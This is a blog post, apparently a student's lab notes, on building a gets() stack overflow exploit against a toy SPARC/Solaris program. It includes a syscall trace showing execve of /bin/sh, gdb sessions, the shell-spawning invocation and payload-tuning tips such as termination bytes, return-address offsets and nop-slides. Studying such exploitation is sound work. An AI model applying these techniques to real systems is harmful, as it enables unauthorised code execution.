sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488)  = 0
sigaction(SIGINT, 0xFFBEF350, 0xFFBEF3D0)       = 0
sigaction(SIGINT, 0xFFBEF2E0, 0xFFBEF360)       = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " s h i f t\n i f   [   -".., 718)    = 375
getcontext(0xFFBEFA08)
getcontext(0xFFBEF4E0)
getcontext(0xFFBEF4E0)
setcontext(0xFFBEF4E0)
sigaction(SIGINT, 0xFFBEF5E0, 0xFFBEF660)       = 0
sigaction(SIGQUIT, 0xFFBEF5E0, 0xFFBEF660)      = 0
sigaction(SIGCLD, 0xFFBEF5E0, 0xFFBEF660)       = 0
execve("/home/bazz/bin/env", 0x001132C8, 0x0010F908)  argc = 5
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/tools/gcc-3.4.2/lib/libc.so.1", 0xFFBEF638) Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF638)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x10B0A4E0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF638)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1018CDC8, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF350) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3)                                        = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192)                        = 0
brk(0x000310C8)                                 = 0
brk(0x000330C8)                                 = 0
getuid()                                        = 100 [100]
getuid()                                        = 100 [100]
execve("/home/bazz/latest/v", 0xFFBEFD64, 0x000314E0)  argc = 1
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF7F0)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x127A87A0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF7F0)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x127A4538, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF508) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3)                                        = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192)                        = 0
sp = 0xwrite(2, " s p   =   0 x", 7)                    = 7
ffbefdb8write(2, " f f b e f d b 8", 8)                 = 8

write(2, "\n", 1)                               = 1
ioctl(0, TCGETA, 0xFFBEFB54)                    Err#25 ENOTTY
fstat64(0, 0xFFBEFBC8)                          = 0
brk(0x00020B00)                                 = 0
brk(0x00024B00)                                 = 0
read(0, "01 A A A01 B B B01 C C C".., 8192)     = 421
read(0, 0x00020B0C, 8192)                       = 0
execve("/bin/sh", 0xFFBEFEB0, 0x00000000)  argc = 2
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libgen.so.1", 0xFFBEF828)        = 0
resolvepath("/usr/lib/libgen.so.1", "/usr/lib/libgen.so.1", 1023) = 20
open("/usr/lib/libgen.so.1", O_RDONLY)          = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x0393CD50, 98304, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 23073, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
mmap(0xFF386000, 2335, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 24576) = 0xFF386000
munmap(0xFF376000, 65536)                       = 0
memcntl(0xFF370000, 6932, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libc.so.1", 0xFFBEF828)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x13ABB888, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF828)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1312EF40, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF360000
mmap(0xFF360000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF360000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF540) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF350000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF270000
mmap(0xFF270000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF270000
close(3)                                        = 0
munmap(0xFF390000, 8192)                        = 0
getpid()                                        = 2098 [2097]
getpgid(2098)                                   = 2097
getsid(2098)                                    = 1819
brk(0x0003A108)                                 = 0
sysconfig(_CONFIG_SIGRT_MIN)                    = 38
sysconfig(_CONFIG_SIGRT_MAX)                    = 45
sigaltstack(0xFFBEFE5C, 0x00000000)             = 0
sigaction(SIGHUP, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGHUP, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGINT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGINT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGQUIT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGQUIT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGILL, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGILL, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGTRAP, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTRAP, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGABRT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGABRT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGEMT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGEMT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGFPE, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGFPE, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGBUS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGBUS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGSEGV, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGSYS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGSYS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPIPE, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPIPE, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGALRM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGALRM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGTERM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTERM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR1, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR1, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR2, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR2, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGPWR, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGPWR, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGURG, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGURG, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPOLL, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPOLL, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGVTALRM, 0x00000000, 0xFFBEFDD8)    = 0
sigaction(SIGVTALRM, 0xFFBEFD38, 0xFFBEFDB8)    = 0
sigaction(SIGPROF, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPROF, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGXCPU, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGXFSZ, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGRTMIN, 0xFFBEFD38, 0xFFBEFDB8)     = 0
sigaction(SIGRTMIN+1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX, 0xFFBEFD38, 0xFFBEFDB8)     = 0
getuid()                                        = 100 [100]
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getgid()                                        = 10 [10]
getuid()                                        = 100 [100]
ioctl(0, TCGETS, 0x000391B0)                    Err#25 ENOTTY
$ write(2, " $  ", 2)                           = 2
read(0, 0x000394D0, 128)                        = 0
fcntl(0, F_GETFL, 0x00000000)                   = 8192
fstat64(0, 0xFFBEFC28)                          = 0
ioctl(0, TCGETA, 0xFFBEFD7C)                    Err#25 ENOTTY
close(0)                                        = 0
llseek(0, 0, SEEK_CUR)                          Err#9 EBADF
_exit(0)
-bash-4.3$

I finally start to put 2 and 2 together…

$PWD/invoke2 v < payload

The above snippet was the problem.. Since I was piping from the file.. when the shell gets spawned it’s just like;; “I GUESS IM FINISHED HERE.. EOF”..

Here’s my temporary happiness inspired from http://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe
Here’s a temporary solution

    without

the beauty of raw tty (you may have to hit enter once at the beginning and again after doing an ‘exit’:

Notes
The difference between invoking /bin/sh -i and simply only /bin/bash is that -i adds automatically the $ prompt. I could not find a way to set the prompt manually when only using /bin/sh thru cat without -i.

Here’s an example of the exploit running, which it does an execve /bin/sh -i

# anything enclosed in [] is note from me added after execution

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ (cat payload; cat) | $PWD/invoke2 v
sp = 0xffbefdb8
[hangs here until you hit enter key, probably an incident of using cat and cooked input]
$ ls
alternating_payload2       asmshell2.bin              exec                       payload3                   v2
alternating_payload2.c     asmshell3.bin              howto_a_payload            payload_asmshell6          v2.c
alternating_payload3       asmshell4.bin              invoke2                    payload_fix_fp             write_raw.bin
alternating_payload3.c     asmshell5_interactive.bin  ksh_shellcode              payload_trashed_fp
asm                        asmshell6.bin              magic_crash_length         readme.txt
asm_tcsh.bin               build_shellcode_steps      payload                    v
asmshell.bin               core                       payload2                   v.c
$ exit
[hangs here until you hit enter key again, probably an incident of using cat and cooked input]
-bash-4.3$

Figure out how much space there is until overflow into Libc (that’s bad)

(gdb) q
-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload2 1024 >> payload; printf "\x00" >> payload
-bash-4.3$ $PWD/invoke2 -d v
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(gdb) b 16
Breakpoint 1 at 0x10750: file v.c, line 16.
(gdb) r < payload
Starting program: /home/bazz/latest/v < payload
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
sp = 0xffbefda0

Program received signal SIGSEGV, Segmentation fault.
0xff2c3064 in memccpy () from /usr/lib/libc.so.1
(gdb)

Only logical explanation is that the buffer needs to be shortened. It must be overwriting libc, or some SUPER out of bounds area… maybe completely went off the charts.. IONNO I try to understand it but it isn’t working so I just cut the buffer down. Actually I just learned. using pmap tools and trialing the buffer size, the fact is that the stack is allocated 8K from FFBEE000 8K read/write/exec [ stack ]
FFBEE000 + 8k (0x2000) = 0xFFBF0000
which is past the page boundary..

(gdb)
0xffbeff80:     0x03424242      0x03434343      0x03444444      0x03454545
0xffbeff90:     0x03464646      0x03474747      0x03484848      0x03494949
0xffbeffa0:     0x034a4a4a      0x034b4b4b      0x034c4c4c      0x034d4d4d
0xffbeffb0:     0x034e4e4e      0x034f4f4f      0x03505050      0x03515151
0xffbeffc0:     0x03525252      0x03535353      0x03545454      0x03555555
0xffbeffd0:     0x03565656      0x03575757      0x03585858      0x03595959
0xffbeffe0:     0x035a5a5a      0x04414141      0x04424242      0x04434343
0xffbefff0:     0x04444444      0x04454545
(gdb)
0xffbefff8:     0x04464646      0x04470000      Cannot access memory at address 0xffbf0000
(gdb)

NOTE!! When exploiting gets(), it is IMPERTINENT to use a 0x0a rather than null byte. is it the leading role in string termination.. I didn’t do that above and it led to hairy things.. I had to hit enter myself causing a \r\n which is why the last 2 bytes are 0000, that was space needed for \r\n I assume.. you can rid this by using 0x0a in your buffer.

in the scheme of exploiting apply, the program can be spawned an unlimited number of times.

To get really sweet, it’s time to open our own TTY to “write” our shellcode through and eventually our own terminal to directly operate with the shell on the other end :)

    Notes On my blade 150

$18 byte difference between debug and production return address offset. This difference does not exist on school production servers.
i.e.
e50 # debug return address – 8
e68 # production return address – 8

To-Do:
Add in a sweet nop-slide
Then find a suitable backoff limit, and fill with nops

Posted in Bash, buffer overflow, Sparc/Solaris

Leave a Reply

Your email address will not be published. Required fields are marked *

*

Skip to toolbar